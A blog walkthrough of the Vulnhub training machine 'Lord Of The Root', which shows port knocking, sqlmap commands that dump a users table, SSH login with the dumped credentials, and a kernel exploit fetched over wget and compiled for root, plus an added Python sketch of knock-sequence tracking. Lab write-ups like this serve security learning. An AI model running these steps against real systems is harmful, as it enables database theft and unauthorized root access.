Lord Of The Root: 1.0.1 Vulnhub Walkthrough

Hello everyone, in this blog I am going to post a walkthrough of Lord Of The Root 1.0.1.

This machine is for beginners.

Let’s Start,

Target IP-

Attacker IP-

Let’s scan the target IP.

nmap -sC -sV -p- -Pn

There is only 1 port open.

22- ssh

I tried connecting to ssh.


I tried a few default passwords, but they didn’t work.

If you look at it carefully, the banner says “knock Friend To Enter” and under that it says “Easy as 1,2,3”.

Later, I got to know that there is something called “Port Knocking”.

Click here to learn about port knocking.

So, Let’s knock ports 1,2,3.

nmap -sT -r -p 1,2,3

-sT : Connect scan

-r : Scan ports consecutively – don’t randomize
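
Why the ordered scan matters: a knock daemon tracks each source's progress through the sequence and resets it on an out-of-order port or a timeout. The sketch below is an added example, not code from this post or from the target machine; the log format, the 10-second window and all function names are assumptions.

```python
from dataclasses import dataclass

KNOCK_SEQUENCE = (1, 2, 3)   # the sequence hinted at by the SSH banner
WINDOW_SECONDS = 10.0        # assumed timeout; the post does not state one


@dataclass
class Progress:
    index: int = 0           # how many ports of the sequence have matched
    started: float = 0.0     # timestamp of the first matching knock


def parse_event(line):
    """Parse a constructed log line of the form '<epoch> <src_ip> <dst_port>'."""
    ts, src, port = line.split()
    return float(ts), src, int(port)


def sources_completing_knock(lines, sequence=KNOCK_SEQUENCE, window=WINDOW_SECONDS):
    """Return sources that hit every port of `sequence` in order within `window`."""
    state = {}
    opened = []
    for ts, src, port in map(parse_event, lines):
        p = state.setdefault(src, Progress())
        if p.index and ts - p.started > window:
            p.index = 0                      # too slow: start over
        if port == sequence[p.index]:
            if p.index == 0:
                p.started = ts
            p.index += 1
        else:
            # A wrong port resets progress; it may itself be the first knock.
            p.index = 1 if port == sequence[0] else 0
            p.started = ts
        if p.index == len(sequence):
            opened.append(src)               # here a daemon would add a firewall rule
            p.index = 0
    return opened


# Constructed sample events (not captured from the machine in this post).
SAMPLE_LOG = [
    "100.0 10.0.0.5 1", "100.1 10.0.0.5 2", "100.2 10.0.0.5 3",   # ordered knock
    "200.0 10.0.0.6 3", "200.1 10.0.0.6 1", "200.2 10.0.0.6 2",   # randomized order
    "300.0 10.0.0.7 1", "300.1 10.0.0.7 2", "320.0 10.0.0.7 3",   # exceeds window
]

if __name__ == "__main__":
    print(sources_completing_knock(SAMPLE_LOG))
```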

Let’s scan the target again,

nmap -sS -A -p-

OK, now we can see that 1 more port got opened and a website is running on it.

1337- http

It’s an image. I checked the page source but I didn’t find anything.

So, I ran Nikto.

nikto -h

I found a directory, /images/.

So, we got image files.

I checked every file but didn’t get anything.

I thought of checking /robots.txt.

It has an image.

I checked the page source, and I found a Base64-encoded string.

I decoded it twice.

So, we got a directory, /978345210/index.php.

We got a login page. I tried a few usernames and passwords but I couldn’t log in.

I used SQLMAP.

sqlmap -u --forms --dbs --risk=3 --level=5 --threads=4 --batch

So, there are 4 databases available.

Next, I checked the tables in the Webapp database.

sqlmap -u --forms -D Webapp --tables

We got the table Users.

Let’s check for columns.

sqlmap -u --forms -D Webapp -T Users --columns

We got id, password and username.

Let’s dump them.

sqlmap -u --forms -D Webapp -T Users -C id,password,username --dump

OK, we got some usernames and passwords.

I tried to log in on the webpage but failed.

As SSH is running, I tried to log in.

Only one username and password worked i.e


ssh smeagol@

I got the shell.

Now, I checked the Linux version.

uname -a

I checked whether any exploit was available for that version and found one.

I downloaded the exploit to my Kali machine and started an HTTP server.

python -m SimpleHTTPServer 8080

After this, I moved into the tmp folder in the shell and downloaded the exploit using wget.

Compiled and executed it.

cd /tmp


gcc 39166.c -o exploit


Here, I got ROOT!!!

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.
